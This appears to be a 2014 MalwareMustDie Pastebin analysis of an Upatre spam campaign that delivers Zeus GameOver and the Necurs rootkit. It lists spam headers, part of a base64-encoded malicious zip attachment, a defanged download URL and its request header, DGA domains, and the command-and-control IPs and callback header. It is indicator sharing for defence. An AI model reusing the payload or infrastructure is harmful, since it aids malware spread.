SHARE
TWEET

UPATRE ZZP of ZGMO campaign via Spam attachment

MalwareMustDie Mar 26th, 2014 463 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMustDie | @unixfreaxjp /malware/checkdomains]$ date
  2. // Thu Mar 27 02:21:55 JST 2014
  3. // UPATRE ZZP of ZGMO campaign via Spam attachment
  4. // Project homebase: http://blog.malwaremustdie.org/2014/03/a-post-to-sting-zeus-p2pgameover-crooks.html
  5.  
  6. // Spambot template: type Cutwail (base64) version
  7. // pic: https://lh6.googleusercontent.com/-VGE48Iutl5A/UzML27nroNI/AAAAAAAAPN8/UH1tP1YHv_o/s529/001.png
  8.  
  9. ------=_Part_63352_2507082818.5786714685312
  10. Content-Type: text/plain; charset=windows-1251; format=flowed
  11. Content-Transfer-Encoding: 7bit
  12.  
  13. Message:
  14.  
  15. Number of Images: 1
  16. Attachment File Type: PDF
  17.  
  18. // Boundary in (base64!!!)
  19.  
  20. ------=_Part_63352_2507082818.5786714685312
  21. Content-Type: application/zip;
  22.  name="Scan_001.zip"
  23. Content-Transfer-Encoding: base64
  24. Content-Disposition: attachment;
  25.  name="Scan_001.zip"
  26.  
  27. UEsDBBQAAAAIAGA6eURlvioWSxwAAABKAAAMAAAAU2Nhbl8wMDEuZXhl7VwJXBTH0u8BFBQE
  28. jxlNPEcF8QQWGEBRXC4PIgbEaBKCzALLkYeAwHok4hGPREefmEONLwooRk00KhGDR3RGFBRF
  29.  
  30. // Virus Total Check/Links:
  31.  
  32. Upatre (spam zip) https://www.virustotal.com/en/file/a3f1a5587129c9101808ff40421186f56fc32acbf2127cdeb54a8fb290907452/analysis/
  33. Upatre (polymorph drop) https://www.virustotal.com/en/file/0a86782adae8a372823abb2293232657161eae5bae6243eea685545e0e5f7448/analysis/1395853555/
  34. ZGMO (Downlaoded/encoded) https://www.virustotal.com/en/file/e85446688c08dd62bb17a21255fe486eb2fb8ca4acc2e4ae974e31a4ad9dfbe0/analysis/1395853489/
  35. ZGMO (Polymorph drop) https://www.virustotal.com/en/file/885d3f004200fcd507c0264f88746ee3f5a7a0e5c42f5b5512d6e5e80cc718c2/analysis/1395853466/
  36. Rootkit (Necurs) https://www.virustotal.com/en/file/f1473d776bca32df38f449b5e4e82bdc58825aabf5b5ab03f02e0b3caaf2a661/analysis/
  37.  
  38.  
  39. // Spambot source:
  40. Received: from unknown (HELO ovh.fr) (109.190.52.100)
  41.   by xx.xx.xx with SMTP; 26 Mar 2014 02:37:19 +0900
  42.  
  43. // Downloads ZGMO from: 91.235.171.231
  44. URL: h00p://pazisnimase.com//wp-content/uploads/2014/03/TARGT.tis
  45.  
  46. //UPATRE GET HEADER:
  47. GET /wp-content/uploads/2014/03/TARGT.tis HTTP/1.1
  48. Accept: text/*, application/*
  49. User-Agent: Updates downloader
  50. Host: pazisnimase.com
  51. Cache-Control: no-cache
  52.  
  53. // Zeus GMO LAME DGA Callback:
  54. uotkvoxytjqodfqytemwormzz.biz
  55. vclbvginizzlydbqpdumvqclv.info
  56. aulbbiwslxpvvphxnjij.biz
  57. biayvwobmkptpjddpjnvrc.com
  58. ypzdfiheskxgmjpjvunvvvsmjtvw.ru
  59. hzdmjjneyeuxkpzkrunrgyqgcukf.org
  60. qkdapcqinizsczxrwaelaimznfbqq.biz
  61. fejbjfceztaigmizxlpjtkivcy.info
  62.  
  63. // Zeus GMO  DGA ALIVE:
  64. aulbbiwslxpvvphxnjij.biz,50.116.4.71,DNS1-5.REGISTRAR-SERVERS.COM
  65. qkdapcqinizsczxrwaelaimznfbqq.biz,178.79.178.243,DNS1.NAMESECURE.COM
  66.  
  67. // Zeus GMO CNC Callbacks
  68. CNC Callback 1 to 50.116.4.71
  69. CNC Callback 2 to 178.79.178.243
  70.  
  71. // CNC Callback Header:
  72. POST /write HTTP/1.1
  73. Host: default
  74. Accept-Encoding:
  75. Connection: close
  76. Content-Length: 326
  77. X-ID: 5555
  78.  
  79. ---
  80. #MalwareMustdie!
RAW Paste Data
Top